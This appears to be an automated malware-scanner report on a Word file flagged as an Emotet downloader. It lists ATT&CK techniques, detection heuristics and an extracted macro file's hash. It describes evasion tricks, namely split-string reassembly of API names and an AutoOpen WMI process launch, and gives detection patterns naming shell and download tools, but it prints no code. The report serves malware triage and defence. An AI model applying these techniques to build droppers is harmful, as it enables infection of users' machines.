Verdict: MALICIOUS
Risk Score: 342

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an AutoOpen function, a common Emotet infection vector. The macro uses obfuscated API calls, specifically reassembling 'winmgmts' from split string literals, to launch a WMI process. This is a strong indicator of a downloader attempting to fetch and execute a secondary payload.
Heuristics (9)
- ClamAV: Doc.Downloader.Emotet-6894115-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6894115-0
- VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44817 bytes | a60e15b2297789cf7283e8a5257e5d84478b85ecbc09a527fd8bbf8996ea926c |

Preview script: first 1,000 lines of the extracted script (truncated in this report).